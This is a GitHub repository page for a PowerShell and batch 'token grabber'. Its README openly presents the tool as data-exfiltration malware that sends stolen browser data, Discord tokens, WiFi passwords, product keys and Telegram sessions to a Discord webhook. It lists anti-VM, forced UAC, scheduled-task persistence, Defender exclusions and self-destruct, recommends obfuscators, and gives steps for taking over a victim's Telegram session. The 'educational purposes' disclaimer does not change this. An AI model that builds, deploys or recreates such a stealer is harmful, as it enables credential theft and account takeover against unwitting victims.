Skip to content

GUS32663/Power-Shell-Token-Stealer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.md
README.md
 
 
main.bat
main.bat
 
 

Repository files navigation



PowerShell Token Grabber

This tool is made for data exfiltration. All information collected is sent using discord webhooks.

Usage

  • Create a Webhook on your Discord Server. I recommend creating a new server.
  • Replace YOUR_WEBHOOK_HERE in line 6 with your webhook.

Want to obfuscate the code ?

Use Invoke-Obfuscation.
Or use Somalifuscator for .bat files

Screenshot

screenshot

Features

  • GUI Builder
  • Force UAC
  • Anti-VM
  • Persistence via Task Scheduler
  • Extracts WiFi Passwords
  • Extracts Browser Data (Brave, Chrome, Firefox, Microsoft Edge etc.)
  • Telegram Session Stealer that Bypasses 2FA
  • Extracts Discord Token
  • Get System Information (Version, CPU, DISK, GPU, RAM, IP, Installed Apps etc.)
  • Takes Desktop Screenshot
  • Get System Uptime
  • Get Screen Resolution
  • List of Installed Applications
  • List of Installed Antiviruses
  • List of all Network Adapters
  • List of Apps that Run On Startup
  • List of Running Services & Applications
  • List TCP Connections and Underlying Process
  • Extracts Product Key
  • Self-Destructs After Execution (optional)

Telegram-Stealer Usage :

After the exfiltrated data is uploaded to your discord webhook, download the compressed file KDOT.zip, inside that folder there will also be another zipped folder telegram-session.zip extract it on your PC. Now, copy the tdata folder and paste it in the directory below:

%userprofile%\AppData\Roaming\Telegram Desktop

Before pasting the tdata folder, ensure that you have deleted the existing tdata folder on your PC.

image

🗑 Uninstaller (Removes the Scheduled Task, Script Folder and ExclusionPaths)

  • Open a new Elevated Powershell Console and Paste the Contents below
$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
  Unregister-ScheduledTask -TaskName "KDOT" -Confirm:$False
  Remove-Item -Path "$env:appdata\KDOT" -force -recurse
  Remove-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
  Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
  Write-Host "[~] Successfully Uninstalled !" -ForegroundColor Green
}
Cleanup

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages